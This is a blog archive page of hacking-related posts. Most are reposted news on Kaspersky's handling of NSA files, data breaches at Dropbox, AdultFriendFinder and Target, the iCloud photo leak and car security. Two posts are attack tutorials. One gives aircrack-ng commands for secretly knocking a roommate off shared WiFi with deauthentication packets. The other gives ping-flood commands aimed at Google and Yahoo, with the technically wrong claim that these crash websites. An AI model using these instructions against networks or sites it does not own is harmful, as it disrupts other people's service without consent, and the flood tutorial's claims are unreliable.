Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts

Thursday, 16 November 2017

Kaspersky: Yes, we obtained NSA secrets. No, we didn’t help steal them

The classified source code, documents, and executable binaries were stored on a computer that used an IP address reserved for Verizon FIOS customers in Baltimore, about 20 miles from the NSA's Fort Meade, Maryland, headquarters, Kaspersky Lab said in an investigation report it published early Thursday morning. Starting on September 11, 2014 and running until November 9 of that year, Kaspersky Lab servers downloaded the confidential files multiple times after the company's antivirus software, which was installed on the machine, found they contained malicious code from Equation Group, an NSA-linked hacking group that operated for at least 14 years before Kaspersky exposed it in 2015.

The downloads—which, like other AV software, the Kaspersky program automatically initiated when it encountered suspicious software that warranted further inspection—included a 45MB 7-Zip archive that contained source code, malicious executables, and four documents bearing US government classification markings. A company analyst who manually reviewed the archive quickly determined it contained confidential material. Within a few days and at the direction of CEO and founder Eugene Kaspersky, the company deleted all materials except for the malicious binaries. The company then created a special software tweak to prevent the 7-Zip file from being downloaded again.

"The reason we deleted those files and will delete similar ones in the future is two-fold," Kaspersky Lab officials wrote in Thursday's report. "We don’t need anything other than malware binaries to improve protection of our customers and secondly, because of concerns regarding the handling of potential classified materials. Assuming that the markings were real, such information cannot and will not [be] consumed even to produce detection signatures based on descriptions."

Pushing back

The report is Kaspersky's latest attempt to refute anonymous allegations, reported last month by The Wall Street Journal, The New York Times, and The Washington Post, that hackers working for the Russian government used Kaspersky AV to locate or steal confidential NSA material stored on a worker's home computer. The initial WSJ report said the AV program somehow alerted the hackers to the presence of the improperly stored files, but the paper said it wasn't clear how the program detected the material or whether company employees alerted the Russian government of those files.

Five days later, the NYT and WaPo said the Russian hackers were caught in the act of abusing the Kaspersky AV by Israeli spies, who happened to be burrowed deep inside Kaspersky's network at the time the confidential NSA files were stolen (Kaspersky Lab disclosed the breach in 2015). A day later, the WSJ went on to report that the role AV played in the hack required changes to the way the program worked and that those modifications likely came with the knowledge of Kaspersky officials.

The allegations, all attributed to unnamed officials with no supporting documentation, helped explain why the US Department of Homeland Security in September took the unprecedented step of directing all US agencies to stop using Kaspersky products and services. A month earlier, according to Cyber Scoop, members of the FBI quietly briefed US companies in the private sector on the threat US officials believed Kaspersky posed to national security. Within weeks of the briefings, retailer Best Buy stopped selling Kaspersky software and offered free removals and credits toward competing packages.

Thursday's report is Kaspersky Lab's attempt to fight accusations that could significantly reduce the revenue it generates in the US and potentially US allies. The report expands on preliminary findings it published three weeks ago that challenge the NSA narrative that its highly privileged access to millions of PCs throughout the world helps the Russian government obtain confidential materials from its adversaries.

Smoke Loader backdoor

Thursday's 13-page report provided more details about a malicious backdoor that infected the Kaspersky customer's computer when it installed a pirated version of Microsoft Office. The report said that Kaspersky AV first detected the trojan known as Smoke Loader and Smoke Bot on October 4 at 11:38pm EDT. That was 22 days after the AV program first detected the Equation Group files and 15 days after Kaspersky had downloaded the 7-Zip file. For it to have been installed, a user would have to temporarily disable the AV program. Kaspersky Lab officials suspect the user turned off protection when it blocked attempts to install the pirated version of Office and once it was installed, then turned the AV back on.

Smoke Loader came to the attention of security researchers in 2011, when a Russian hacker advertised the Trojan for sale in an underground forum. During the time it infected the computer storing the NSA material, it relied on a command and control domain that was registered to someone using the name Zhou Lou, an address in Hunan, China, and the e-mail address This analysis, which was published three months before Kaspersky Lab says the Baltimore PC was infected, reports Smoke Loader contained a range of malicious capabilities, including the ability for attackers to remotely control it. There may have been more malware besides Smoke Loader installed on the computer. During the same two-month span, Kaspersky AV provided 121 alerts for non-NSA software.

"The hygiene of this user on the Internet was not very good," Brian Bartholomew, a US-based principal security researcher at Kaspersky Lab, told Ars. "All that leads to the possibility that there was potentially someone else on that system at the time" the NSA materials were reported stolen. "We see no indications of that, but there is that possibility."

Kaspersky Lab has additional information about the backdoor here.

One of the few new pieces of information in the report is the revelation of a detection rule Kaspersky Lab added to its AV in 2015. To better detect a surveillance operation known as TeamSpy, the AV program started scanning files that embedded the word "secret" inside its code. A malware analyst, the report said, added it because TeamSpy malware was designed to automatically collect certain files of interest to the attackers. Specifically, files of interest contained both extensions such as .doc, .rtf, .xls, .mdb, and .pdf and words including "pass," "secret," and "saidumlo" (the Georgian translation for secret). The 2015 detection rule searched files for strings including:

The rule might explain reporting in the latter WSJ article that, citing unnamed officials, said Kaspersky AV "searched for terms as broad as 'top secret,' which may be written on classified government documents, as well as the classified code names of US government programs."

Plausible deniability

Like the preliminary findings Kaspersky published three weeks ago, Thursday's report isn't likely to change the minds of critics who say the company's ties to the Kremlin pose an unacceptable risk to US security.

"It's very, very believable," Dave Aitel, a former NSA analyst and long-time Kaspersky critic said of the information Kaspersky Lab has brought to light. "But my personal perspective is that it does not address whatever the [US government] has on Kaspersky."

Still, Kaspersky's version of events raises a variety of inconsistencies and questions in the narrative provided by the unnamed people cited in the October articles. For instance:

Is the computer Kaspersky described the same one that stored the NSA secrets that were stolen by Russian hackers? If it is, why did the news accounts say the data theft occurred in 2015?
If the PCs are the same, do US government investigators have any evidence it was infected by malware at the time it stored those materials? If yes, have investigators ruled out the possibility the infection played a role in the location or theft of the NSA materials?
How can US government investigators be sure Kaspersky AV was modified intentionally to help Russian spies locate the NSA material?
Representatives with the NSA declined to answer the questions and referred Ars to FBI officials. The FBI declined to comment as well.

In fairness to US officials, there are often valid national security reasons for not providing specific pieces of information when disclosing classified information to reporters. What's more, if Russian President Vladimir Putin were to order Kaspersky Lab to help steal NSA secrets, it's not at all clear the Moscow-based company would have a legal mechanism to challenge the demand. Such an order would almost certainly require absolute secrecy and the kinds of vigorous denials Kaspersky Lab is publishing now.

This leaves much of the security world in a geopolitical he-said/she-said duel that makes it hard to know which version of events to believe. This stalemate isn't likely to resolve itself until US officials provide more details.

"I think it's plausible that Kaspersky Lab has been used to obtain confidential material, but so far we've only seen accusations, largely from anonymous sources," Jake Williams, a malware expert at Rendition InfoSec who worked in the NSA's elite Tailored Access Operations hacking group until 2013, told Ars. "Credible evidence and/or on the record statements from the US government are needed before we attack a foreign company."

This article was first posted on ARSTECHNICA.COM
Read more ...

Thursday, 22 June 2017

How to kick someone out from WiFi using Kali Linux

Are you fed up of your annoying roommate or flatmates because they are using all the bandwidth of your wifi connection.

Here is the solution for you people to kick out that annoying friend of yours from wifi without letting them know.


this process needs aircrack-ng tool. if you are using any penetration testing linux distro then you don't have to install it. other user have to install this tool.

First open a new terminal and type in ifconfig to find the name of your wireless card.( In my case the name is wlan0)

now take down your wireless card with this command :

ifconfig wlan0 down

Don't worry at the end of this tutorial  I will tell you how to get it back up.

Now we will scan for networks.( we will ger network BSSID and channel)

use this command to scan for netowrks:

aireplay-ng -9 wlan0

Now we will scan for connected devices on the network

airodump-ng -c 6 --bssid xx:xx:xx:xx:xx:xx -w psk wlan0

-c is for the channel that the network is broadcasting on.

--bssid is for the network mac address we just wrote down.

Now we just wait a few seconds and the devices connected to the network after some time connected devices will show up here with their MAC address.

write down the mac address of the device you want to kick out from your network

Now we will kick the device of our network .

To do that use this command:

aireplay-ng -0 15 -a xx:xx:xx:xx:xx:xx -c yy:yy:yy:yy:yy:yy wlan0

-0 means that we will send deAuth packets to the device.

15 is the amount of deAuth packets (if you want to send deAuth packets continously then replace 15 with 0)

-a is to set the networks BSSID which we wrote down earlier.

-c is to set the device's MAC address that you would like to kick of the network.

Great! Now we are sending the deAuth packtes! The devices should now be disconnctes from the network.

Now it's time to back up your wireless card. If your card is down you wouldn't be able to connect to a wifi network.

type in:

ifconfig wlan0 up

Author- Arun Kumar (CEH)

Read more ...

Monday, 25 May 2015

Hacked: Security breached of member information of adult dating site AdultFriendFinder

An online dating site for adults seeking sexual trysts has been hacked, potentially compromising the personal information of some of its 64 million members, the company said on Friday., part of Sunnyvale, California-based FriendFinder Networks Inc, said it had contacted law enforcement, including the FBI, and a private investigative team to review the incident.

"FriendFinder Networks Inc. recently became aware of a potential data security incident," the company said in a statement on Friday. "The security of our members' information remains our top priority and, upon learning of this incident, we took immediate action," it said.

So far, there is no evidence that members' financial information has been compromised, it added.

AdultFriendFinder bills itself as "the hottest dating, hookup and sex community." Members are asked a host of personal information, including marital or relationship status, sexual orientation and intimate interests.

The company did not describe the nature of the data breach, but said it had taken immediate steps to protect members' privacy by "temporarily disabling the username search function and masking usernames of any users we believe were affected by the security issue."

FriendFinder Networks said it has 600 million-plus members on more than 40,000 sites.

Source Reuters
Read more ...

Wednesday, 15 April 2015

Government watchdog says that in-flight WiFi could allow hackers to hijack planes

In a report released earlier this week, U.S. government watchdog group GAO (Government Accountability Office) warned that the increasing connectivity of our aircraft, from flight tracking technologies to in-flight WiFi, could give hackers an access point to tap in and potentially hijack a flight.

“New networking technologies connecting FAA’s ATC information systems expose these systems to new cybersecurity risks, potentially increasing opportunities for systems to be compromised and damaged,” says the GAO.

“Such damage could stem both from attackers seeking to gain access to and move among information systems, and from trusted users of the systems, such as controllers or pilots, who might inadvertently cause harm.”

Speaking with FAA officials and experts, the GAO discovered that older, legacy systems are actually more difficult to access remotely than many modern systems, as the old systems do not connect directly to the FAA over the Internet. On the other hand, the NextGen systems will interoperate with one another, which means that if one system is compromised, others will be at risk as well.

The GAO says that although the FAA is “taking steps” to improve cybersecurity, there is more that can be done to protect our airlines from cyber threats.

“While FAA is working to transform the organization of its cybersecurity efforts,” says the GAO, “the experts we consulted said that it could improve upon those efforts by including all key stakeholders in its agency-wide approach. All 15 of our cybersecurity and aviation experts agreed that organizational clarity regarding roles, responsibilities, and accountability is key to ensuring cybersecurity across the organization.”

Read more ...

Thursday, 12 February 2015

CyberCrime : Masters OF Deception : The gang that really were the kings and ruled the cyberspace but were finally prosecuted!

The original Masters of Deception included: Mark Abene ("Phiber Optik"), Paul Stira ("Scorpion"), Eli Ladopoulos ("Acid Phreak"), HAC, John Lee ("Corrupt") and Julio Fernandez ("Outlaw").

Additional members whose real names are unknown include: Supernigger (also of DPAK), Wing, Nynex Phreak, Billy_The_Kid, Crazy Eddie, The Plague, ZOD, Seeker, Red Knight (who was also a member of Cult of the Dead Cow), Lord Micro, n00gie and peaboy (a.k.a. MCI Sprinter).

Masters of Deception (MOD) was a New York-based group of hackers, most widely known in media for their exploits of telephone company infrastructure and later prosecution, as well as being the subject of the book Masters of Deception: The Gang That Ruled Cyberspace by Josh Quittner.


Masters of Deception operated differently in many respects to previous hacking groups. Although they openly shared information with each other, they took a controversial view on sharing information outside the group. It was believed that access to MOD's knowledge should be earned via degrees of initiation and a proven respect for the craft, rather than releasing powerful information into the wild where it could be used for nefarious purposes. A demonstration of responsibility on the part of the initiate was required. This informal compartmentalized protection of more sensitive knowledge was a structure originally employed by LOD in the 1980s, rather successfully. According to Lex Luthor, "I realized early on that only certain people can be trusted with certain information, and certain types of information can be trusted to no one. Giving out useful things to irresponsible people would inevitably lead to whatever thing it was being abused and no longer useful. I was very possessive of my information and frequently withheld things from my articles."—Phrack #40 interview, 1/8/1992.

Their Story + Origin

MOD's initial membership grew from meetings on Loop-Around Test Lines that led to legendary collaborations to hack RBOC phone switches and the various minicomputers and mainframes used to administer the telephone network. They successfully remained underground using alternative handles to hide even their true hacker identities.

Acid Phreak founded the Masters of Deception with Scorpion and HAC. The name itself was, among other things, a mockery of LOD, as 'M' is one letter up in the alphabet from 'L', although the name originally was a flexible acronym that could be used to identify membership in situations where anonymity would be the best course of action. It could stand for "Millions of Dollars" just as easily as "Masters of Deception."

It is claimed that the mockery of the LOD name was a statement to the underground that LOD had lost its direction. Several LOD members were close friends of MOD who had been raided and indicted by the government, causing the majority of those who remained to drop out of the underground for safety reasons. In their absence, LOD largely fell into disarray causing the disagreement and disillusionment that led Phiber Optik to align himself with MOD in an effort to restore the direction of the spirit of underground hacking.

The Fall of MOD

As a result of a major nationwide investigation by a joint FBI/Secret Service task force, five of MOD's members were indicted in 1992 in federal court. The case was prosecuted by the U.S. Attorney's Office for the Southern District of New York by Assistant U.S. Attorneys Stephen Fishbein and Geoffrey S. Berman.[1] Within the next six months (in 1993), all five pleaded guilty and were sentenced to either probation or prison. After the sentencing of Abene, 2600: The Hacker Quarterly, Winter 1993-94, had on its cover a rag doll labeled "BERMAN" stabbed by a dagger

Source Wikipedia

Read more ...

Tuesday, 14 October 2014

Hacker Claims 7 Million Dropbox Accounts Compromised, Dropbox Denies

Dropbox is at the centre of a leak scandal, following the releasing of 400 usernames and passwords by an anonymous user on Pastebin.

The hacker claims the initial dump is just a portion of the 6,937,081 Dropbox accounts he claims to have compromised on Tuesday. He then requested Bitcoins in payment before he would allow access to more accounts.

In a statement to The Next Web Dropbox said the service had not been hacked and these passwords were expired.

    Dropbox has not been hacked. These usernames and passwords were unfortunately stolen from other services and used in attempts to log in to Dropbox accounts. We’d previously detected these attacks and the vast majority of the passwords posted have been expired for some time now. All other remaining passwords have been expired as well.

At the time of writing, when entering the leaked usernames and passwords into Dropbox, the service prompts the user to reset your password by sending an email to the registered address. Some reddit commenters claimed they could access the accounts shortly after the leaks, yet this has not been verified.

The latest attack follows the celebrity nude photo scandal in August, where dozens of A-List Hollywood stars had their iCloud accounts hacked and private photographs leaked online by an unidentified hacker.

To protect yourself from hackers getting to your personal information, it is advised you set up two-step verification on your Dropbox account, and all other accounts that have the option for that matter.

Have something to add to this story? Share it in the comments.
Source Mashable
Read more ...

Wednesday, 3 September 2014

The FBI Is Now Involved in Hunt for the Celebrity Nude Photo Hacker

Actress Mary Elizabeth Winstead, one of the celebrities whose photos were taken, at the Independent Spirit Awards on Feb. 23, 2013, in Santa Monica, California.

The FBI is looking into the iCloud celebrity photos hack, though it did not say whether it has opened an investigation.

Anonymous users began posting nude photos of actors and celebrities including Jennifer Lawrence, Kate Upton and Mary E. Winstead on the image-sharing websites AnonIB and 4Chan over the past week after the photos were allegedly stolen from the stars' iCloud accounts. As the images began to spread, an anonymous 4Chan user posted a list of dozens of other celebrities he or she claims to have photos and videos of. Some photos have been verified by the subjects, while the authenticity of others has been contested.

“The FBI is aware of the allegations concerning computer intrusions and the unlawful release of material involving high-profile individuals, and is addressing the matter," FBI public affairs officer Christopher Allen said in a statement provided to Mashable. "Any further comment would be inappropriate at this time.”

    A representative from the Los Angeles Police Department told Mashable that it is "not investigating any hacking incidents."

A representative from the Los Angeles Police Department told Mashable that it is "not investigating any hacking incidents."

Representatives for Jennifer Lawrence told Mashable they had gotten in touch with "authorities" soon after nude pictures of Lawrence began appearing online Sunday.

“This is a flagrant violation of privacy," a spokesperson for Lawrence said. "The authorities have been contacted and will prosecute anyone who posts the stolen photos of Jennifer Lawrence.”

Apple also told Mashable that it is looking into the hack.

"We take user privacy very seriously and are actively investigating this report," Apple representatives said.

Mashable has also learned that Apple is working directly with celebrities and their publicists to investigate the breach.

Though the culprit or culprits remain unidentified, the allegedly enormous cache of nude celebrity photos likely comes from the work of several hackers who have been involved in a deep-web celebrity image-trading network that may have existed for years, according to Gawker.

A member of the network may have begun to leak the photos in recent weeks, which led to the images surfacing on more public websites on Sunday. Other leakers may have joined in once some images went public.

One AnonIB user, whom other users have dubbed the "original leaker," seemed to confirm that the stash of photos is the result of multiple hackers.

"Guys, I didn't do this by myself," he or she wrote. "There were several other people who were in on it and I needed to count on them to make this happen."

The user also claimed to be changing location to avoid authorities.

One 4Chan user, Bryan Hamade, was thought to be an original leaker after he asked for bitcoin donations from 4Chan users in exchange for more photos. He offered proof of more images by uploading a screenshot of his hard drive, but didn't scrub the name of his hard drive or the name of the hard drive network from that screenshot, allowing Reddit users to quickly dig up his identity.

Hamade, a server administrator for Southern Digital Media, adamantly denied that he was involved in the hacking in a response to questions by several media outlets. He said he was just trying to make out with some bitcoin donations, though Gawker reports that some photos have appeared on Hamade's posts and nowhere else, meaning he may be more than just a copycat.

Though no legal authority has confirmed opening a criminal case investigating the privacy breach, recent precedent shows that the hacker could face serious time behind bars.

Christopher Chaney was sentenced to 10 years in jail in 2012 after he was convicted of hacking into celebrity email accounts, stealing nude images of stars such as Scarlett Johansson and Mila Kunis, and posting those photos online.

Have something to add to this story? Share it in the comments.
Topics: Celebrities, Dev & Design, Entertainment, FBI, Film, hack, jennifer lawrence, Music, Photos, Television, U.S.
Source Mashable
Read more ...

Tuesday, 26 August 2014

Attackers Who Downed PlayStation Servers for Hours Still Unknown

People are reflected on a wall of the Sony building at Ginza shopping district in Tokyo on May 14.
he culprits behind a distributed denial of service attack on PlayStation Network servers that spanned from Sunday to Monday are still unknown, though two different Twitter users have claimed responsibility.

One of those Twitter users also appeared to threaten an American Airlines flight on which Sony Online Entertainment President John Smedley was a passenger, forcing it to land in Phoenix, Arizona instead of San Diego, California to be scanned for explosives, though none were found and it's unclear whether the DDoS attack was related. Sony is the parent company of PlayStation.

See also: Plane Takes Off in Front of a Tornado

The two Twitter accounts — @LizardSquad and @FamedGod — that claimed responsibility for downing PlayStation's online gaming servers have yet to be identified beyond their handles.

They've been labeled "hackers," and one has even been said to be a part of the Islamic State, the Islamist radicals that have taken over large swaths of territory in Iraq and Syria. Evidence for either of those claims, though, is scant.

A DDoS attack sends an extraordinary amount of traffic to server, causing it to shut down, but it is not a hack. The attacker does not have to break into anything, and no account information was reportedly stolen from Play Station users.

And the only evidence for the claim that @LizardSquad is affiliated with the Islamic State is a series of the account's tweets, which were sent amidst other tweets that seem to dare the FBI to investigate.

@LizardSquad has also offered no evidence that the account is affiliated with the Islamic State, nor any evidence to take responsibility for bringing down PlayStation's servers.

The other account, @FamedGod, took credit for the attack with a video, which has since been taken down.

PlayStation issued a statement once the servers were back online to reassure users who thought the gaming system's networks had been hacked.

"We have seen no evidence of any intrusion to the network and no evidence of any unauthorized access to users’ personal information," the statement said.

The FBI is still trying to determine where the bomb threat was tweeted from, according to FBI Special Agent Perryn Collier, who works at the agency's Phoenix branch.

“What we have to do is figure out how this threat was transmitted, where it came from, who’s responsible," Collier said.

He said they weren't able to go into any more information while the investigation is ongoing.

Have something to add to this story? Share it in the comments.
Topics: Airplane, Bomb, FBI, hacker, playstation, U.S., US & World

Source -Mashable
Read more ...

Sunday, 24 August 2014

More Than 1,000 Businesses Hit by Same Cyber Attack as Target

Shoppers arrive at a Target store in Los Angeles on Dec. 19, 2013.

Target wasn't the only business that experienced a cyber attack that compromised tens of millions of its customers' credit cards, according to the Secret Service.

More than 1,000 American businesses were hit by the same cyber attack that affected in-store cash registers at Target last year, The New York Times reported Friday.

According to a Department of Homeland Security advisory obtained by the New York Times, the attacks were "much more pervasive" than initially reported as hackers received access to millions of payment card data being sold on the black market. Homeland Security officials encouraged all businesses, "regardless of size," to check for "Point of Sale malware infections," according to the report.

The data breach involves criminals scanning a company's system for vendors or employees who have remote access. Hackers run programs to guess username and password combinations to get inside those systems. Once in, they target the in-store cash register systems with malware known as "Backoff," comb through the systems and take payment card data.

In July, Homeland Security, the Secret Service, the National Cybersecurity and Communications Integration Center and their partners warned companies to check their in-store cash register systems for the Backoff malware. After the warning, only seven companies — including Supervalu and UPS — have opened up about their systems being affected, despite the Secret Service's much steeper estimates.

In the wake of Target's announcement about the Nov. 27 to Dec. 15 data breach, the company was heavily criticized after it waited almost a month before letting customers know that their personal information may have been compromised.

The Target attack is considered to be one of "the largest data breaches from any consumer business." It affected more than 70 million Target customers and h

Following the breach in May, Target Chief Executive Gregg Steinhafel was replaced by the company's former Chief Financial Officer John Mulligan. Target also hired a new chief information officer who previously worked at Homeland Security as a tech adviser a month prior to the leadership shuffle.

To confront the spread of the malware, the Secret Service and Homeland Security recommended that companies limit the number of vendors that have outside access to the corporate systems, and require more complex passwords and login lock outs after failing to sign in multiple times.

Additionally, they recommended revisions to a company's in-store cash register systems, including two-step verification and ways to better encrypt a customer's data.

Have something to add to this story? Share it in the comments.
Read more ...

Tuesday, 12 August 2014

How to crash a website?

First I will say this. Do not do this to anyone’s website or server except your own. This can get you prison time. This is for educational purposes. I will show you how to crash a website then I will show you how to prevent such attacks.
The most common way to crash a website is by sending mass amounts of data to the server that it is stored on. This means instead of simply crashing a single site you may crash multiple sites. It all depends on how many websites are stored on the server for the particular IP Address.
I wrote in previous blogs how to setup a server to host a website. I also wrote how to setup a server to host multiple websites. Both of the blogs show you how to setup server with a single IP address. I would recommend reading those blogs and setting up your own server so you can do the attack that I’m going to be doing on this blog.

Getting Started

First of all no matter what computer your using, and no matter what Operating System you have. You should already have the tools that you need to do this. These tools are listed below.
  • Ping
  • Any tool to find an IP Address of a website (Ping, Whois)
Now that you know the only two things that you will need lets get started. I will first show you how to achieve this with Windows.
In Windows you will simply fire up the command prompt. To do this their a several ways. But I will simply tell you the most universal way of doing it for Windows. Simply search for CMD or in older versions of windows use the RUN program and type CMD.
This should open up your command prompt window. This window allows you to type DOS commands into it. So now we will need to get the IP address of a website. PING can do this, or even a whois website. So lets use ping to obtain the IP Address of lets say Google. To do this we will type the following into our command prompt.


After typing in the above command and pressing Enter. You should get the following result.

Pinging [] with 32 bytes of data:

Reply from bytes=32 time=56ms TTL=127
Reply from bytes=32 time=25ms TTL=127
Reply from bytes=32 time=27ms TTL=127
Reply from bytes=32 time=47ms TTL=127

Ping statistics for
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 25ms, Maximum = 56ms, Average = 38ms

Great so now we know that Google’s IP Address is But of course who really needed didn’t already know the IP Address of Google.
Now we will use Ping once again. However this time we will Ping the IP Address. so we will type the following.

ping -t -l 65500

The above command will cause a continuing output of the following.

Pinging with 65500 bytes of data:

Request timed out.
Request timed out.

It will continue to do this until the site crashes.
So what exactly did we do?
Well Ping is a tool that sends packets of data from your computer to another computer. In our case the computer we are pinging is Google’s Server.
So just typing the word ping followed by pressing Enter into the Windows command line will output the following.

Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]

[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] target_name

-t Ping the specified host until stopped.
To see statistics and continue - type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.

What the above shows are instructions on using Ping. So we used the -t switch and the -l switch in our earlier command. So as the above results show us. What we did was we told ping to keep sending data to a certain computer until the computer that we are sending data to stops accepting data. That is why we used the -t switch. We also used the -l switch. By looking st our switch list we can see that the -l switch allows use to choose the size of data packet we will send to a computer.
So in my example I used -l 65500. This is because that was the most I could use on my test machine. If you have more internet you would use the biggest number you can use.
In short what we did was flood Google’s Servers with so much data that it ended up crashing. Of course we have to hope that the server we are attacking has less bandwidth then we do, or else we will end up crashing.
Now lets do the same thing in a Unix System.
To do this on a Unix system we will need to first use the -c switch. -c is the count switch. We use this because the defualt ping tool on Unix systems will keep ping infinitely if we don’t tell it when to stop. So we will type the following into the Terminal.

ping -c 4

The above will output the following.

PING ( 56(84) bytes of data.
64 bytes from ( icmp_req=1 ttl=48 time=231 ms
64 bytes from ( icmp_req=2 ttl=48 time=71.1 ms
64 bytes from ( icmp_req=3 ttl=49 time=60.7 ms
64 bytes from ( icmp_req=4 ttl=49 time=67.0 ms

--- ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3003ms
rtt min/avg/max/mdev = 60.764/107.642/231.599/71.661 ms

So now we see that we sent out 64 bytes of data to 4 times. We also see that the IP Address of the Yahoo domain name is So we will now do the following.

ping -s 65500

The above will give an output until the target computer has shutdown. The output will look like the following.

PING ( 65500(65528) bytes of data.
65508 bytes from icmp_req=1 ttl=53 time=389 ms
65508 bytes from icmp_req=2 ttl=53 time=390 ms
65508 bytes from icmp_req=3 ttl=53 time=405 ms
65508 bytes from icmp_req=4 ttl=53 time=350 ms
65508 bytes from icmp_req=5 ttl=53 time=370 ms
65508 bytes from icmp_req=6 ttl=53 time=387 ms
65508 bytes from icmp_req=7 ttl=53 time=379 ms
65508 bytes from icmp_req=8 ttl=53 time=389 ms
65508 bytes from icmp_req=9 ttl=53 time=367 ms
65508 bytes from icmp_req=10 ttl=53 time=385 ms
65508 bytes from icmp_req=11 ttl=53 time=362 ms

Preventing The Attack

So how do we protect our servers from such an attack. Well it’s extremely simple. However for hobbyist who don’t have a lot of money and who are using someones ISP company to get internet access it can be kind of pricey. What we need to do is give our servers more bandwidth then an average computer user would have. Either way you’ll never have to much bandwidth. The more bandwidth you have the faster your site will be on the web. Plus it gives you more of a cushion for such attacks that I showed you in this blog. The method of getting more bandwidth is common method that all major companies use to prevent against such attacks. So in theory if you got more bandwidth then your victim has you will still be able to attack your victim.
Read more ...

Sunday, 10 August 2014

Spying revelations lead to encryption boom in Germany

MOUNTAIN VIEW: Revelations about the National Security Agency's electronic eavesdropping capabilities have sparked anger in Germany and a boom in encryption services that make it hard for the most sophisticated spies to read emails, listen to calls or comb through texts.

Jon Callas, co-founder of Silent Circle, which sells an encryption app allowing users to talk and text in private, said a series of disclosures from former intelligence contractor Edward Snowden last year have been a boon for business.

Silent Circle is one of a host of online security companies cashing in on swarms of new security-conscious customers around the world who want to shield their communications from foreign governments — and nowhere is the market hotter than in Germany, whose chancellor, Angela Merkel, was reported to be a target.

"Germans have always been particularly attuned to security and privacy concerns," Callas said. "I think that culturally, Germany has seen privacy problems in their recent past. There are people who remember the communists. There is still a cultural sore spot over security and privacy, an understanding of what can go wrong better than any other place in the world."

The companies' customers range from diplomats and journalists to privacy advocates and people trying to protect trade secrets.

"If you're a reporter, you can talk confidentially to a source. If you're a banker, you can talk to a client. If you're a business person, you can use it in places where spying is a cultural norm," Callas said.

Although Silent Circle doesn't provide specific numbers, Callas said it saw a "huge increase" in subscriptions to its private phone and text service after Snowden's disclosures and a spike in Germany after two reported cases of suspected US spying there earlier this year.

And while the technology has Silicon Valley roots, the servers are in Canada and Switzerland, two countries with strong privacy protections. Two weeks ago, Silent Circle also began selling a secure smartphone, whose first run sold out, Callas said.

At CeBIT, a leading tech industry event held annually in the German city of Hannover, Deutsche Telekom was among several companies to launch new security products on the back of Snowden's revelations.

"I want to send a personal thanks to the NSA, because we wouldn't be having this discussing if that hadn't happened," Reinhard Clemens, a Deutsche Telekom board member, told reporters. "That was the best marketing campaign we've ever had."

The company, known for its T-Mobile brand in the United States, sells a smartphone app that encrypts voice and data traffic. It was developed with Berlin-based firm GSMK, an offshoot of the German hacking group Chaos Computer Club.

Customers seeking an all-in-one solution can buy GSMK's $2,750 secure cellphone that will protect confidential communications from all but the most dedicated eavesdroppers.

Chief executive Bjoern Rupp said his company has seen a surge of interest in its encryption technology since details of the NSA's surveillance capabilities leaked last year.

"Snowden is transforming the industry," Rupp told The Associated Press. "There is a completely new consciousness about security."

Since launching in 2003, the company has sold about 100,000 secure devices, but the number of apps sold in the past year is "in another dimension," said Rupp, without revealing a precise figure.

British rival Vodafone, meanwhile, launched its own "Secure Call" app at the CeBIT fair with the claim it would allow users to make "calls that are as secure as those of the German government."

Merkel herself used to be photographed with a Nokia slider phone. Since reports surfaced that the NSA had listed her among its foreign intelligence targets, the chancellor has avoided being seen with low-end devices. Her new gadget, as widely reported, is a top-range BlackBerry outfitted with a custom-made security suite made by German company Secusmart — endorsed for sensitive communications by Germany's Federal Office for Information Security.

Apparently seizing on the opportunity, BlackBerry recently announced it was buying Secusmart.

"The acquisition of Secusmart underscores our focus on addressing growing security costs and threats ranging from individual privacy to national security," BlackBerry CEO John Chen said in a statement.

Ravishankar Borgaonkar, who works with Telekom Innovation Laboratories and FG Security in Berlin, uses an app on his Samsung smartphone that detects how secure each call is with red and green buttons.

"I try to make my calls as secure as possible," he said. "I get paranoid about some stalker trying to look at my phone, because if they get in it they can get to all my data."

And as someone who works in tech, Borgaonkar said he's getting tapped a lot these days for help.

"All my friends who are not in technology are asking me if their phones are secure, and what they should do," he said.

For those who don't want to take any chances, the revelations have also sparked a retro trend. The country's business weekly Wirtschaftswoche recently reported typewriter sales rising for the first time in years.

German companies aiming to protect their trade secrets apparently have turned to typewriters to ensure their correspondence with foreign clients isn't intercepted by rivals capable of hacking into their computer networks.

Patrick Sensburg, a member of Merkel's conservative bloc and chair of the parliamentary committee investigating alleged NSA spying in Germany, even suggested — only half-jokingly — that he and his fellow lawmakers might start using typewriters to hide the panel's sensitive work
Read more ...

Saturday, 9 August 2014

Hacking group wants to play nice with automakers

A group of cars for sale is pictured at a car dealership in Los Angeles, California April 1, 2014.

A group of well-known hackers and security professionals are trying to build better ties with the auto industry in an effort to enlist their help in improving vehicle security, one of the hottest areas of cyber research.
The non-profit group, known as "I am the Cavalry," is asking attendees at this weekend's Def Con hacking conference in Las Vegas to sign an open letter to "Automotive CEOs" to ask them to implement basic guidelines to defend cars from cyber attacks. (
    "The once distinct worlds of automobiles and cyber security have collided," said the letter. "Now is the time for the automotive industry and the security community to connect and collaborate."
Vehicles rely on tiny computers to manage everything form engines and brakes to navigation, air conditioning and windshield wipers. Security experts say it is only a matter of time before malicious hackers are able to exploit software glitches and other vulnerabilities to try to harm drivers.
The Cavalry group is scheduled to make a presentation at Def Con on Saturday about efforts to improve auto security. They will not disclose any specific problems that might embarrass carmakers, said Josh Corman, a security industry professional who co-founded the group a year ago.
    That sensitivity contrasts with much of the hacking research presented these days at Def Con, which attracts more than 10,000 attendees. For instance, one high-profile paper being released this year reviewed 20 vehicle models to find the three "most hackable" cars.
The Cavalry group has been trying to smooth relations between researchers and industry by promoting responsible disclosure. That means they approach carmakers to discuss bugs before going public, giving them time to fix them.
"The goal is build trust," said Corman, chief technology officer of software firm Sonatype. "In the past, these hacking talks were 'Look at me. Look at what I did.' There wasn't much care for what happens next and how it affects the industries."
Leaders of the Cavalry - which has several hundred active members who also study medical devices, consumer electronics and critical infrastructure - have spent the past year meeting with other security experts, manufacturers, regulators and lawmakers.

